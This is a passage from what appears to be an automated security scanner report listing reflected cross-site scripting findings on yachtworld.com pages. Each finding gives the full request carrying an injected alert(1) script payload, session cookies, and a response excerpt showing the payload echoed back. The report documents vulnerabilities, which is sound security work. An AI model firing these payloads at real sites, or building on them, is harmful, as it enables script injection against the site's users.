VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 22:41:57 GMT
Server: Apache
Cache-Control: private
Content-Length: 2606
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<script>alert(1)</script>9a0952813dc/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/clarkslanding73aa4-->
...[SNIP]...

3.488. http://www.yachtworld.com/core/listing/video_gallery.jsp [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/video_gallery.jsp

Issue detail

The value of the hosturl request parameter is copied into the HTML document as plain text between tags. The payload dd698<script>alert(1)</script>d17fc8182d2 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/video_gallery.jsp?boat_id=2265386&hosturl=clarkslandingdd698<script>alert(1)</script>d17fc8182d2&&ywo=clarkslanding&&ybw= HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 22:41:55 GMT
Server: Apache
Cache-Control: private
Content-Length: 2588
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

 Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/clarkslandingdd698<script>alert(1)</script>d17fc8182d2/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/clarkslandingdd698<script>
...[SNIP]...

3.489. http://www.yachtworld.com/core/rendering/email-boat.htm [boatId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/rendering/email-boat.htm

Issue detail

The value of the boatId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b57d7'%3balert(1)//a62c995b2e8 was submitted in the boatId parameter. This input was echoed as b57d7';alert(1)//a62c995b2e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/rendering/email-boat.htm?url=legendary&boatId=2266476b57d7'%3balert(1)//a62c995b2e8&units=Feet&officeId=75325&boatUrl=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:35:13 GMT
Server: Apache
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "2266476b57d7';alert(1)//a62c995b2e8"<br>
...[SNIP]...

3.490. http://www.yachtworld.com/core/rendering/email-boat.htm [boatUrl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/rendering/email-boat.htm

Issue detail

The value of the boatUrl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 131b6</script><script>alert(1)</script>095de22c92a was submitted in the boatUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/rendering/email-boat.htm?url=legendary&boatId=2266476&units=Feet&officeId=75325&boatUrl=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States131b6</script><script>alert(1)</script>095de22c92a HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:35:22 GMT
Server: Apache
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
"http://www.yachtworld.com/core/rendering/email-boat.htm?url=legendary&boatId=2266476&units=Feet&officeId=75325&boatUrl=/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States131b6</script><script>alert(1)</script>095de22c92a";
}

//-->
...[SNIP]...

3.491. http://www.yachtworld.com/core/rendering/email-boat.htm [officeId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/rendering/email-boat.htm

Issue detail

The value of the officeId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 403f4"><script>alert(1)</script>6fe988ae964 was submitted in the officeId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/rendering/email-boat.htm?url=legendary&boatId=2266476&units=Feet&officeId=75325403f4"><script>alert(1)</script>6fe988ae964&boatUrl=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:35:17 GMT
Server: Apache
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<input type="hidden" name="officeId" value="75325403f4"><script>alert(1)</script>6fe988ae964"/>
...[SNIP]...

3.492. http://www.yachtworld.com/core/rendering/email-boat.htm [officeId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/rendering/email-boat.htm

Issue detail

The value of the officeId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46671"%3balert(1)//12af253f94 was submitted in the officeId parameter. This input was echoed as 46671";alert(1)//12af253f94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/rendering/email-boat.htm?url=legendary&boatId=2266476&units=Feet&officeId=7532546671"%3balert(1)//12af253f94&boatUrl=%2Fboats%2F2006%2F32-Regulator-With-Trailer-**reduced**-2266476%2FDestin%2FFL%2FUnited-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; 